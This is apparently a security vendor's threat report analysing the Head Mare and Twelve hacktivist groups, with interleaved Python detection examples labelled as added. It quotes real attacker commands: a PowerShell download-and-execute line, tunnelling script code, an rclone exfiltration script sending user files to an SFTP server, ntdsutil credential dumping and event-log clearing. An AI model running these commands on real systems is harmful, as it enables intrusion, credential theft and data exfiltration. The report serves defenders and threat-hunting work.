Introduction
In September 2024, a series of attacks targeted Russian companies, revealing indicators of compromise and tactics associated with two hacktivist groups: Head Mare and Twelve. Our investigation showed that Head Mare relied heavily on tools previously associated with Twelve. Additionally, Head Mare attacks utilized command-and-control (C2) servers exclusively linked to Twelve prior to these incidents. This suggests potential collaboration and joint campaigns between the two groups.
The attackers continue to refine their methods, employing both familiar tools from past Head Mare incidents and new PowerShell-based tools.
This report analyzes the software and techniques observed in recent Head Mare attacks and how these overlap with Twelve’s activities. The focus is on Head Mare’s TTPs and their evolution, with notes on commonalities with Twelve’s TTPs.
Technical details
Head Mare’s toolkit
The attackers used various publicly available tools, including open-source software and leaked proprietary tools, to achieve their goals.
- mimikatz;
- ADRecon;
- secretsdump;
- ProcDump;
- Localtonet;
- revsocks;
- ngrok;
- cloudflared;
- Gost;
- fscan;
- SoftPerfect Network Scanner;
- mRemoteNG;
- PSExec;
- smbexec;
- wmiexec;
- LockBit 3.0;
- Babuk.
Some of these tools were mentioned in our previous report on Head Mare, while others were new to their arsenal.
Notable new tools
Among the tools used by Head Mare were some not previously employed by the hacktivists but seen in attacks by other groups. For instance, they used the CobInt backdoor for remote access to domain controllers, previously observed only in Twelve’s attacks on Russian companies. This is an interesting fact, suggesting that Twelve and Head Mare may be sharing tools.
In addition to CobInt, the attackers used their own PhantomJitter backdoor, installed on servers for remote command execution. This tool appeared in the group’s arsenal in August 2024. We described its modus operandi in a story accessible to the subscribers of our Threat Intelligence reports.
Another new tactic involved a tool for remote command execution on a business automation platform server. Thus, the attackers used both proven and new tools, demonstrating flexibility and adaptability.
Initial Access
While previous Head Mare attacks relied solely on phishing emails with malicious attachments, they now also infiltrate victims’ infrastructure through compromised contractors with access to business automation platforms and RDP connections. This confirms the trend of hacktivists exploiting trusted relationships (T1199 – Trusted Relationship and T1078 – Valid Accounts).
The attackers also exploited software vulnerabilities, most commonly CVE-2023-38831 in WinRAR through phishing emails. In one incident, they exploited the Microsoft Exchange server vulnerability CVE-2021-26855 (ProxyLogon). Although patched in 2021, this vulnerability is still exploitable due to organizations using outdated operating systems and software. Our telemetry data revealed domain controllers still running Microsoft Windows Server 2012 R2 Server Standard x64 or, as in the aforementioned incidents, Microsoft Exchange Server 2016 used for email.
The attackers used ProxyLogon to execute a command to download and launch CobInt on the server.
Persistence
The method of establishing persistence has changed. Instead of creating scheduled tasks, the attackers now create new privileged local users on a business automation platform server. They use these accounts to connect to the server via RDP to transfer and execute tools interactively.
They also install traffic tunneling tools like Localtonet for persistent access to the target host. They made Localtonet persistent with the help of Non-Sucking Service Manager (NSSM), which allows running any application as a Windows service, as well as monitoring and restarting it if it fails for some reason. This user-friendly tool is often used legitimately to install and manage programs that cannot function as services. Localtonet and NSSM help the malicious actor to maintain continuous access to the infected host.
Anti-detection techniques
Head Mare continued to use the Masquerading technique (T1655), naming utility executables like standard operating system files. The investigation found files such as:
Software | Path in the system
Cloud storage sync tool rclone | C:\ProgramData\wusa.exe
PhantomJitter | C:\Windows\System32\inetsrv\calc.exe
cloudflared | C:\Windows\System32\winuac.exe
Gost | C:\Windows\System32\winsw.exe
In one incident, cmd.exe was renamed to log.exe and launched from C:\Users\[username]\log.exe.
Besides renaming files, the attackers also removed services and files they had created and cleared event logs to evade detection. Relevant artifacts were found in the PowerShell command history on attacked machines:
stop-service -name <servicename>
remove-service -name <servicename>
remove-service -name "<servicename>"
sc stop <servicename>
sc delete <servicename>
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
The ransomware executable also cleared system logs, as evidenced by a flag in the configuration of the samples that we have analyzed.
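The two evasion behaviours above, renamed binaries and log clearing, both leave traces in process-creation telemetry. The following Python example is added here and is not code from the report: it checks Sysmon-style process events for a PE whose compiled-in original name differs from its file name on disk, for well-known binary names running outside the directory they belong in, and for the log-clearing and service-removal commands quoted from the PowerShell history. The event field layout, the expected-directory table and the sample events are constructed for this example.

```python
import re
from pathlib import PureWindowsPath

# Directory Windows normally keeps each genuine binary in; the names are the
# ones the report lists as disguises (lookup table constructed for this example)
EXPECTED_DIR = {
    "wusa.exe": r"c:\windows\system32",
    "calc.exe": r"c:\windows\system32",
    "cmd.exe": r"c:\windows\system32",
}

# Anti-forensic command patterns, taken from the PowerShell history quoted above
LOG_CLEARING = [
    re.compile(r"\bclear-eventlog\b", re.I),
    re.compile(r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b", re.I),
]
SERVICE_REMOVAL = [
    re.compile(r"\bremove-service\b", re.I),
    re.compile(r"\bsc(?:\.exe)?\s+delete\b", re.I),
]


def check_process(event):
    """Return a list of findings for one process-creation event.

    `event` mimics the fields of a Sysmon event ID 1 record: Image,
    OriginalFileName (from the PE version resource) and CommandLine.
    """
    findings = []
    image = PureWindowsPath(event["Image"])
    name = image.name.lower()
    original = event.get("OriginalFileName", "").lower()
    # A renamed binary: the name compiled into the PE differs from the file name
    if original and original != name:
        findings.append(f"renamed binary: {image.name} is really {original}")
    # A well-known name living outside the directory it belongs in
    expected = EXPECTED_DIR.get(name)
    if expected and str(image.parent).lower() != expected:
        findings.append(f"{name} outside {expected}: {image}")
    cmd = event.get("CommandLine", "")
    if any(p.search(cmd) for p in LOG_CLEARING):
        findings.append("event log clearing")
    if any(p.search(cmd) for p in SERVICE_REMOVAL):
        findings.append("service removal")
    return findings


def scan(events):
    """Map each event's index to its findings, skipping clean events."""
    return {i: f for i, e in enumerate(events) if (f := check_process(e))}


# Constructed sample events modelled on the artefacts described in the report
SAMPLE_EVENTS = [
    {"Image": r"C:\ProgramData\wusa.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r'C:\ProgramData\wusa.exe --config="C:\ProgramData\1.conf" sync'},
    {"Image": r"C:\Windows\System32\inetsrv\calc.exe", "OriginalFileName": "",
     "CommandLine": r"C:\Windows\System32\inetsrv\calc.exe"},
    {"Image": r"C:\Users\alice\log.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"C:\Users\alice\log.exe /c whoami"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell.exe -c Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"},
    {"Image": r"C:\Windows\System32\sc.exe", "OriginalFileName": "sc.exe",
     "CommandLine": "sc delete winsw"},
    {"Image": r"C:\Windows\System32\calc.exe", "OriginalFileName": "CALC.EXE",
     "CommandLine": "calc.exe"},  # genuine calc.exe, should stay clean
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"], findings)
```

The OriginalFileName comparison is what catches the renamed cmd.exe even though log.exe is not in any lookup table; the directory check covers tools such as rclone that carry no telling original name.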
Command and Control
After exploiting the business automation platform server, attackers downloaded and installed the PhantomJitter backdoor. In the incidents we observed, the backdoor was downloaded into the victims’ infrastructure from the following URLs:
http[:]//45.87.246[.]34:443/calc.exe
http[:]//185.158.248[.]107:443/calc.exe
The file was saved in the local directory as c.exe. Upon launch, it connected to the C2 server, allowing the operator to execute commands on the compromised host.
In addition to PhantomJitter, the attackers used CobInt, whose payload connected to the following C2 server:
360nvidia[.]com
The domain resolves to the IP address 45.156.27[.]115.
Pivoting
The group expanded its arsenal to achieve their objectives at this stage. To gain remote access to the compromised infrastructure, they used a custom PowerShell script named proxy.ps1 to install and configure cloudflared and Gost.
Gost is a lightweight, powerful proxy utility offering various network routing and traffic hiding capabilities. It supports multiple protocols and can create secure communication channels, bypass blocks, and establish tunnels.
Cloudflared tunnels traffic through the Cloudflare network. It establishes a secure connection to an attacker-controlled Cloudflare server, acting as a proxy for C2 communication. This bypasses network restrictions like NAT (Network Address Translation) and firewall rules that might hinder direct connections between the victim host and attacker servers.
The proxy.ps1 script can also download archives from URLs specified on a command line and extract them to a temporary folder. Below is the help output for the script:
Usage: .\proxy.ps1 -r https://<site>.com/archive.zip -p gost_port -t cloudflared_token
Parameters:
-l Extract archive locally.
-r Download and extract archive remotely.
-p Specify the port for the gost.
-t Specify the token for the cloudflared.
-u Uninstall gost & cloudflared.
-h Show this help message.
The script defines constants for filenames, installing cloudflared and Gost with names mimicking standard Windows services in the C:\Windows\System32 folder. The script uses the GetTempFileName function to obtain temporary file paths.
$archivePath = "win.zip"
$filesPath = "C:\Windows\System32"
$cloudflaredPath = Join-Path -Path $filesPath -ChildPath "winuac.exe"
$gostPath = Join-Path -Path $filesPath -ChildPath "winsw.exe"
$winswPath = Join-Path -Path $filesPath -ChildPath "winsws.exe"
$winswxmlPath = Join-Path -Path $filesPath -ChildPath "winsws.xml"
$tempFile = [System.IO.Path]::GetTempFileName()
If the -p flag is specified in the command line, a service for the Gost tool will be installed on the system. The following function is used for this:
function Setup-Gost-Service {
    # Set port
    [xml]$winswxml = Get-Content $winswxmlPath
    $winswxml.service.arguments = $winswxml.service.arguments -replace '42716', $p
    $winswxml.Save($winswxmlPath)
    Write-Host "[*] Port number updated to $port in $winswxmlPath"
    # Service install
    Write-Host "[*] Installing gost as service"
    Start-Process $winswPath -ArgumentList "install" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
    $output = Get-Content $tempFile
    Write-Output $output
    Start-Process $winswPath -ArgumentList "start" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
    $output = Get-Content $tempFile
    Write-Output $output
}
In this code snippet, the script installs the Gost executable file as a service and passes necessary settings to it.
If the -t key is passed to the script, it installs and configures cloudflared in the system.
function Setup-Cloudflared-Service {
    # Service install
    Write-Host "[*] Installing cloudflared as service"
    Start-Process $cloudflaredPath -ArgumentList "service install $t" -RedirectStandardError $tempFile -NoNewWindow -Wait
    $output = Get-Content $tempFile
    Write-Output $output
}
In this code snippet, the script installs the cloudflared service and passes settings to it by means of the command line.
In addition to installing and configuring tunneling tools, the script has the ability to remove the artifacts they leave behind. The script can also stop and uninstall the cloudflared and Gost services, if the -u parameter is passed to it when it launches.
if ($u) {
    Write-Host "[*] Uninstalling gost"
    Start-Process sc.exe -ArgumentList "stop winsw" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
    $output = Get-Content $tempFile
    Write-Output $output
    Start-Process $winswPath -ArgumentList "uninstall" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
    $output = Get-Content $tempFile
    Write-Output $output
    Write-Host "[*] Uninstalling cloudflared"
    Start-Process sc.exe -ArgumentList "stop winuac" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
    $output = Get-Content $tempFile
    Write-Output $output
    Start-Process $cloudflaredPath -ArgumentList "service uninstall" -RedirectStandardError $tempFile -NoNewWindow -Wait
    $output = Get-Content $tempFile
    Write-Output $output
    $filePaths = @(
        "C:\Windows\System32\winsws.wrapper.log",
        "C:\Windows\System32\winsws.err.log",
        "C:\Windows\System32\winsws.out.log",
        "C:\Windows\System32\winsws.xml",
        "C:\Windows\System32\winsws.exe",
        "C:\Windows\System32\winsw.exe",
        "C:\Windows\System32\winuac.exe"
    )
    foreach ($filePath in $filePaths) {
        if (Test-Path $filePath) {
            Remove-Item -Path $filePath -Force
            Write-Output "[*] Deleted: $filePath"
        } else {
            Write-Output "[*] File not found: $filePath"
        }
    }
}
After deleting the services, the script deletes executables, configuration files, and logs of the tools.
In one incident, the attackers downloaded cloudflared and Gost from the server 45[.]156[.]21[.]148, which we previously saw in Head Mare attacks. An example download link is:
hxxp://45[.]156[.]21[.]148:8443/winuac.exe
Besides cloudflared and Gost, the attackers used cloud tunnels like ngrok and Localtonet. Localtonet is a reverse proxy server providing internet access to local services. The attackers launched it as a service using NSSM, downloading both tools from the official Localtonet website (localtonet[.]com).
hxxp://localtonet[.]com/nssm-2.24.zip
hxxp://localtonet[.]com/download/localtonet-win-64.zip
After downloading, they extracted the tools and launched them with these parameters:
nssm.exe install Win32_Serv localtonet.exe authtoken <token>
These commands allow installing Localtonet as a service and authorizing it with a token for configuration.
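Every tunnelling tool in this section ends up registered as a Windows service (cloudflared and Gost through proxy.ps1, Localtonet through NSSM), so the service list is a natural place to hunt for them. The following Python example is added here and is not the report's code: it scores service records against the disguise names, tool names and service-mode arguments given above. The record layout (name, display_name, image_path, plus NSSM-style application and app_parameters fields), the sample records and the token placeholders are constructed assumptions.

```python
import re
from pathlib import PureWindowsPath

# Binary names the report saw used for the tunnelling services: winsw.exe is Gost,
# winuac.exe is cloudflared, winsws.exe is the wrapper proxy.ps1 installs
DISGUISED_BINARIES = {"winsw.exe", "winsws.exe", "winuac.exe"}
# Wrappers that turn an arbitrary program into a Windows service
SERVICE_WRAPPERS = {"nssm.exe", "winsws.exe"}
# Tunnelling tools named in the report, and arguments typical of their service mode
TUNNEL_TOOLS = re.compile(r"\b(localtonet|ngrok|cloudflared|gost)\b", re.I)
TUNNEL_ARGS = re.compile(r"(\bauthtoken\b|\btunnel\s+run\b|--token\b)", re.I)


def split_image_path(path_name):
    """Split a service ImagePath into (executable, arguments), honouring quotes."""
    path_name = path_name.strip()
    if path_name.startswith('"'):
        end = path_name.find('"', 1)
        return path_name[1:end], path_name[end + 1:].strip()
    exe, _, args = path_name.partition(" ")
    return exe, args


def assess_service(svc):
    """Return the reasons a service record looks like tunnelling persistence."""
    reasons = []
    exe, args = split_image_path(svc["image_path"])
    exe_name = PureWindowsPath(exe).name.lower()
    # Everything the service would actually run: the binary's own arguments plus,
    # for NSSM-style wrappers, the wrapped application and its parameters
    command = " ".join(filter(None, [exe, args, svc.get("application", ""),
                                     svc.get("app_parameters", "")]))
    if exe_name in DISGUISED_BINARIES:
        reasons.append(f"binary name {exe_name} matches a known disguise")
    if exe_name in SERVICE_WRAPPERS and "application" in svc:
        reasons.append(f"{exe_name} wraps {svc['application']}")
    if TUNNEL_TOOLS.search(command):
        reasons.append("command line references a tunnelling tool")
    if TUNNEL_ARGS.search(command):
        reasons.append("command line carries tunnel-style arguments")
    return reasons


def hunt(services):
    """Map service name to reasons for every service that scored at least one."""
    return {s["name"]: r for s in services if (r := assess_service(s))}


# Constructed service records modelled on the artefacts described above;
# the tokens are placeholders, not real values
SAMPLE_SERVICES = [
    {"name": "wuauserv", "display_name": "Windows Update",
     "image_path": r"C:\Windows\system32\svchost.exe -k netsvcs -p"},
    {"name": "winsw", "display_name": "Microsoft Windows Update",
     "image_path": r'"C:\Windows\System32\winsws.exe"'},
    {"name": "winuac", "display_name": "Microsoft UAC Service Wrapper",
     "image_path": r'"C:\Windows\System32\winuac.exe" tunnel run --token PLACEHOLDER_TOKEN'},
    {"name": "Win32_Serv", "display_name": "Win32_Serv",
     "image_path": r"C:\ProgramData\nssm.exe",
     "application": r"C:\ProgramData\localtonet.exe",
     "app_parameters": "authtoken PLACEHOLDER_TOKEN"},
]

if __name__ == "__main__":
    for name, reasons in hunt(SAMPLE_SERVICES).items():
        print(name, reasons)
```

The wrapper check matters because NSSM's own ImagePath says nothing about Localtonet; the wrapped program only shows up in the service's Parameters subkey, which is why the record carries it as a separate field.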
Reconnaissance
The attackers used common system reconnaissance tools like quser.exe, tasklist.exe, and netstat.exe on local hosts. They primarily used fscan and SoftPerfect Network Scanner for local network reconnaissance, along with ADRecon, a tool for gathering information from Active Directory. ADRecon is a PowerShell script not previously observed in the group’s arsenal.
The attackers also used ADRecon to study the Active Directory domain, including computers, accounts, groups, and trust relationships between domains. The command history showed various domains passed as arguments to the script:
.\ADRecon.ps1 -DomainController <FQDN A>
.\ADRecon.ps1 -DomainController <FQDN B>
.\ADRecon.ps1 -DomainController <FQDN C>
<..>
Privilege Escalation
The attackers exploited previously compromised accounts of victims and their contractors, and created privileged local accounts, particularly when exploiting the business automation software server. If a user has sufficient permissions to remotely execute commands on the server, this software allows running a child command prompt process, such as cmd.exe, with privileges in the operating system corresponding to the program’s privileges. Since business automation software typically has administrator privileges in the OS, the child process also becomes privileged. The attackers exploited this opportunity: after gaining access to the vulnerable software server, they created a privileged local account on whose behalf they launched a command interpreter.
Command Execution
The attackers launched the Windows command interpreter on the business automation platform server in the target system within a process that executed the following command line:
cmd /c powershell.exe -ep bypass -w hidden -c iex ((New-Object Net.WebClient).DownloadString('http://web-telegram[.]uk/vivo.txt')) > $temp\v8_B5B0_11.txt
This command downloads and executes the vivo.txt file, which we were unable to obtain. However, based on system events, we suspect that it opened a reverse shell, which the operator used to create two files in the target system.
c:\programdata\microsoft\drive\mcdrive.vbs
c:\programdata\microsoft\drive\mcdrive.ps1
Then, using reg.exe, the attackers added an autorun entry to execute mcdrive.vbs with the interpreter wscript.exe.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v "mcdrivesvc" /t REG_EXPAND_SZ /d "wscript.exe "$appdata\Microsoft\Drive\mcdrive.vbs
The VBS file is an obfuscated Visual Basic script that creates an ActiveX object reference named WScript.Shell and uses its Run() function to execute an obfuscated command line.
A deobfuscated command line snippet follows:
%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -ex bypass -NoLogo -NonInteractive -NoProfile -w hidden -c iex ([System.IO.File]::ReadAllText('C:\ProgramData\Microsoft\Drive\mcdrive.ps1'))
This command reads and executes the C:\ProgramData\Microsoft\Drive\mcdrive.ps1 file through the PowerShell interpreter. This file is a CobInt loader, previously seen only in Twelve’s arsenal. The mcdrive.ps1 script determines the operating system’s bitness, then decrypts and executes the payload, which initiates a request to a C2 server at 360nvidia[.]com. The image below shows a graph obtained from analysis in the Cloud Sandbox on our Threat Intelligence Portal.

Payload execution analysis graph. The IP address shown on the graph corresponds to the domain 360nvidia.com
Credential Access
The investigation identified tools for obtaining credentials. Besides the publicly available mimikatz utility, the attackers used secretsdump and ProcDump. Secretsdump was found on one victim’s system at the following paths:
[USERNAME]\Desktop\secretsdump.exe
[USERNAME]\Desktop\secretsdump (1).exe
A new Go-based sample named update.exe was also discovered, enabling the dumping of the ntds.dit file and the SYSTEM/SECURITY registry hive using ntdsutil.exe.
powershell ntdsutil.exe "'ac i ntds'" 'ifm' "'create full temp'" q q
Additionally, manual PowerShell commands were observed for dumping data from these locations.
ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp1' q q
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
While no traces of the first command’s successful execution were found, the results of the second one were located at the following paths:
temp\Active Directory
temp\registry
temp\Active Directory\ntds.dit
temp\Active Directory\ntds.jfm
temp\registry\SECURITY
temp\registry\SYSTEM
temp\[REDACTED].zip
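A detection for the ntdsutil IFM dumping shown in this section has to cope with two things visible in the command lines above: ntdsutil accepts abbreviated commands ("ac i ntds" is "activate instance ntds"), and the quoting differs depending on whether cmd, PowerShell, or PowerShell wrapping cmd launched it. The Python example below is added here and is not the report's code: it normalises the quoting, matches both the abbreviated and the full command forms, and extracts the output directory. The sample command lines are the three from this section plus constructed benign and long-form variants.

```python
import re

# ntdsutil accepts any unambiguous prefix of a command, so "ac i ntds" and
# "activate instance ntds" are the same thing; the IFM media set is created by
# "ifm" followed by "create full <dir>" (or "create sysvol full <dir>")
IFM_PATTERN = re.compile(
    r"\ba(?:c|ct|ctivate)?\s+i(?:n|ns|nst|nstance)?\s+ntds\b"
    r".*?\bifm\b"
    r".*?\bcreate\s+(?:sysvol\s+)?full\s+(?P<path>\S+)",
    re.I,
)


def normalize(cmdline):
    """Drop quote characters and collapse whitespace so the pattern sees the
    same token stream regardless of how the shell quoted the arguments."""
    return " ".join(re.sub(r"[\"']", " ", cmdline).split())


def detect_ifm(cmdline):
    """Return details if the command line creates an IFM media set, else None."""
    norm = normalize(cmdline)
    if "ntdsutil" not in norm.lower():
        return None
    m = IFM_PATTERN.search(norm)
    if not m:
        return None
    return {
        "output_path": m.group("path"),
        "via_powershell": "powershell" in norm.lower(),
        "normalized": norm,
    }


# The three command lines from this section, plus constructed variants
SAMPLE_COMMANDS = [
    r"""powershell ntdsutil.exe "'ac i ntds'" 'ifm' "'create full temp'" q q""",
    r"ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp1' q q",
    r"""powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" """,
    # constructed: long-form commands and the sysvol variant
    r'ntdsutil "activate instance ntds" "ifm" "create sysvol full C:\ifm_out" quit quit',
    # constructed: legitimate use of ntdsutil that does not create IFM media
    r'ntdsutil "ac i ntds" "files" "info" q q',
    r"cmd /c whoami",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(detect_ifm(cmd) or "clean", "<-", cmd)
```

Matching on the normalised token stream rather than on the raw text is what keeps one rule working across the three invocation styles; the output path is worth keeping because it points straight at the ntds.dit and registry hive copies to look for on disk.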
Lateral Movement
The attackers used RDP to connect to systems, including with privileged accounts. They connected to NAS servers via SSH and used tools like mRemoteNG, smbexec, wmiexec, PAExec, and PsExec for remote host communication.
Data Collection and Exfiltration
Another new tool in Head Mare’s arsenal was a script running wusa.exe. Normally, this file name is used by the legitimate Windows update process. However, the script’s launch parameters indicated that the file was actually the rclone.exe utility. Rclone is an open-source project for copying and synchronizing files between storages of different types, making it convenient for data transfer.
@echo off
setlocal enabledelayedexpansion
set inputFile=C:\ProgramData\1.txt
for /f "tokens=*" %%A in (%inputFile%) do (
    set hostname=%%A
    start /wait "" C:\ProgramData\wusa.exe --config="C:\ProgramData\1.conf" --sftp-socks-proxy <username>:<password>@64.7.198.109:80 sync "\\%%A\C$\Users" sftpP:/data/<path> -q --ignore-existing --auto-confirm --include "*.doc" --include "*.docx" --include "*Desktop/**" --include "*Documents/**" --include "*Downloads/**" --include "*.pdf" --include "*.xls" --include "*.xlsx" --include "*.zip" --include "*.rar" --include "*.txt" --include "*.pn*" --include "*.ppt" --include "*.pptx" --include "*.jp*" --include "*.eml" --include "*.pst" --multi-thread-streams 12 --transfers 12 --max-age 3y --max-size 1G
)
endlocal
The script takes the file 1.txt as input, which contains a list of hosts. For each host, it runs rclone.exe to transfer files from the device to an SFTP server through a SOCKS proxy. The attackers only exfiltrated files from specific directories or files matching the extension patterns specified in the script.
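The batch script hands rclone a long command line, and an analyst wants the indicators in it (proxy, source share, destination remote, filters, age window) extracted rather than read by eye. The following Python example is added here and is not taken from the report: it parses one expanded invocation of that command line and states what makes it an exfiltration. The sample command line is constructed from the script above, with the %%A variable expanded to a made-up hostname and placeholder credentials and destination path.

```python
import re
from pathlib import PureWindowsPath

# rclone flags that take a value (the subset used by the script above)
VALUE_FLAGS = {"sftp-socks-proxy", "include", "exclude", "max-age", "max-size",
               "transfers", "multi-thread-streams", "config"}
ADMIN_SHARE = re.compile(r"^\\\\(?P<host>[^\\]+)\\[a-z]\$(?:\\|$)", re.I)
PROXY = re.compile(r"^(?:(?P<user>[^:@]*)(?::(?P<password>[^@]*))?@)?"
                   r"(?P<host>[^:@]+)(?::(?P<port>\d+))?$")


def split_windows_args(cmdline):
    """Minimal quote-aware splitter: backslashes are kept literally (cmd.exe
    semantics, not POSIX) and the double quotes themselves are removed."""
    args, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def parse_rclone(cmdline):
    """Break an rclone invocation into executable, subcommand, positionals,
    include filters and flags."""
    tokens = split_windows_args(cmdline)
    parsed = {"exe": tokens[0], "command": None, "positional": [],
              "includes": [], "flags": {}}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("--"):
            key, eq, val = tok[2:].partition("=")
            if not eq and key in VALUE_FLAGS:   # value is the next token
                i += 1
                val = tokens[i]
            if key == "include":
                parsed["includes"].append(val)
            else:
                parsed["flags"][key] = val if (eq or key in VALUE_FLAGS) else True
        elif tok.startswith("-"):
            parsed["flags"][tok[1:]] = True
        elif parsed["command"] is None:
            parsed["command"] = tok
        else:
            parsed["positional"].append(tok)
        i += 1
    return parsed


def assess_exfil(cmdline):
    """Return (findings, indicators) for an rclone-style command line."""
    p = parse_rclone(cmdline)
    findings, indicators = [], {}
    exe_name = PureWindowsPath(p["exe"]).name.lower()
    rclone_only = {"sftp-socks-proxy", "ignore-existing", "multi-thread-streams"} & set(p["flags"])
    if exe_name != "rclone.exe" and (rclone_only or p["command"] in {"sync", "copy", "move"}):
        findings.append(f"{exe_name} behaves like rclone (masquerading)")
    if len(p["positional"]) == 2:
        src, dst = p["positional"]
        m = ADMIN_SHARE.match(src)
        if m:
            findings.append(f"source is an admin share on {m.group('host')}")
            indicators["source_host"] = m.group("host")
        # A remote destination is "name:path"; a local drive is a single letter
        remote, colon, _ = dst.partition(":")
        if colon and len(remote) > 1:
            findings.append(f"destination is the remote '{remote}'")
            indicators["remote"] = remote
    proxy = p["flags"].get("sftp-socks-proxy")
    if proxy and (m := PROXY.match(proxy)):
        indicators["proxy_host"] = m.group("host")
        indicators["proxy_port"] = m.group("port")
        findings.append("SFTP traffic routed via SOCKS proxy " + m.group("host"))
    indicators["includes"] = p["includes"]
    indicators["max_age"] = p["flags"].get("max-age")
    return findings, indicators


# Constructed from the batch script above: %%A expanded to HOST01, placeholder
# credentials and destination path, a shortened include list
SAMPLE_CMDLINE = (
    r'C:\ProgramData\wusa.exe --config="C:\ProgramData\1.conf" '
    r'--sftp-socks-proxy exfil_user:PLACEHOLDER_PW@64.7.198.109:80 '
    r'sync "\\HOST01\C$\Users" sftpP:/data/PLACEHOLDER_PATH -q --ignore-existing '
    r'--auto-confirm --include "*.docx" --include "*Desktop/**" --include "*.pst" '
    r'--multi-thread-streams 12 --transfers 12 --max-age 3y --max-size 1G'
)

if __name__ == "__main__":
    for line in assess_exfil(SAMPLE_CMDLINE)[0]:
        print(line)
```

The proxy credentials are parsed but never stored in the indicators, only the host and port; the include list and the three-year age window are kept because they describe exactly which files left the network.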
Final goal: file encryption
As in previous attacks, they encrypted data using variants of LockBit 3.0 (for Windows systems) and Babuk (for NAS devices). The investigation found that the LockBit file was initially saved on the victim’s host at the following paths:
- C:\Users\{username}\Desktop\locker.exe;
- C:\Windows\SYSVOL\Intel\locker.exe.
Below is a sample ransom note, with the cybercriminals’ contacts redacted:
Connection between Head Mare and Twelve
In addition to the aforementioned TTPs, we attribute these attacks to Head Mare based on the following characteristics:
- A previously seen IP address:
  - 45.156.21[.]148
- Malware:
  - PhantomJitter
Further details about these indicators can be found in the private report on the Threat Intelligence Portal: “HeadMare’s new PhantomJitter backdoor dropped in attacks exploiting Microsoft Exchange”.
However, the presence of Twelve’s tools like CobInt suggests collaboration. To test this hypothesis, activity cluster diagrams were created based on the Diamond Model framework. Overlaps – common elements in the tactics of both groups – are highlighted in red, indicating potential coordination.
In the image above, we see for the first time the use of the CobInt malware in Head Mare attacks. Previously, it was present only in the arsenal of the Twelve group, the analysis of which is presented below.
Also, the analysis of the two models revealed overlaps in the infrastructure (C2s) of the groups. The following infrastructure elements appearing in Head Mare attacks were also present in a number of incidents related to the activities of the Twelve group.
- 360nvidia[.]com;
- 45.156.27[.]115
In addition, we have identified other similarities in the arsenal of the two groups:
- File names:
  - proxy.ps1
  - ad_without_dc.ps1
- Paths:
  - C:\Windows\System32\winsw.exe
  - C:\Windows\System32\winsws.exe
  - C:\Windows\System32\winuac.exe
- Service names:
  - winsw (Microsoft Windows Update)
  - winuac (Microsoft UAC Service Wrapper)
- Victims:
  - Manufacturing, government, energy
The final intersection points of the Head Mare and Twelve groups are shown in the image below. Given the overlaps in infrastructure, TTPs, CobInt malware, and victim choices, we assume that these groups act together, exchanging access to command-and-control servers and various tools for carrying out attacks.
Conclusion
Head Mare is actively expanding its set of techniques and tools. In recent attacks, they gained initial access to the target infrastructure by not only using phishing emails with exploits but also by compromising contractors.
They also use tools previously seen in attacks by other groups, such as Twelve’s CobInt backdoor.
This is not the only similarity between the two groups. In addition to the toolkit, the following were noticed:
- Shared command-and-control servers: 360nvidia[.]com, 45.156.27[.]115
- PowerShell scripts accessing these C2 servers: mcdrive.ps1
- Scripts for tunneling network connections: proxy.ps1
Based on the factors described above, we assume that Head Mare is working with Twelve to launch attacks on state- and privately controlled companies in Russia. We will continue to monitor the activity of the attackers and share up-to-date information about their TTPs. More details about the hacktivists’ activities and their tools, such as PhantomJitter, can be found in the materials available to subscribers of our Threat Intelligence reports.
Indicators of compromise
Please note: the network addresses given in this section were valid at the time of publication but may become outdated in the future.
Hashes:
6008E6C3DEAA08FB420D5EFD469590C6 | ADRecon.ps1
09BCFE1CCF2E199A92281AADE0F01CAF | calc.exe, c.exe
70C964B9AEAC25BC97055030A1CFB58A | locker.exe
87EECDCF34466A5945B475342ED6BCF2 | mcdrive.vbs
E930B05EFE23891D19BC354A4209BE3E | mimikatz.exe
C21C5DD2C7FF2E4BADBED32D35C891E6 | proxy.ps1
96EC8798BBA011D5BE952E0E6398795D | secretsdump.exe, secretsdump (1).exe
D6B07E541563354DF9E57FC78014A1DC | update.exe
File paths:
C:\Windows\SYSVOL\Intel\locker.exe
C:\ProgramData\Microsoft\Drive\mcdrive.ps1
C:\ProgramData\Microsoft\Drive\mcdrive.vbs
C:\ProgramData\proxy.ps1
C:\ProgramData\wusa.exe
C:\Users\{USERNAME}\AppData\Roaming\1.bat
C:\Users\{USERNAME}\AppData\Roaming\Microsoft\Windows\Recent\mimikatz.lnk
C:\Users\{USERNAME}\AppData\Roaming\proxy.ps1
C:\Users\{USERNAME}\Desktop\Обработка.epf
C:\Users\{USERNAME}\Desktop\ad_without_dc.ps1
C:\Users\{USERNAME}\Desktop\ADRecon.ps1
C:\Users\{USERNAME}\Desktop\h.txt
C:\Users\{USERNAME}\Desktop\locker.exe
C:\Users\{USERNAME}\Desktop\mimikatz.exe
C:\Users\{USERNAME}\Desktop\mimikatz.log
C:\Users\{USERNAME}\Desktop\secretsdump (1).exe
C:\Users\{USERNAME}\Desktop\secretsdump.exe
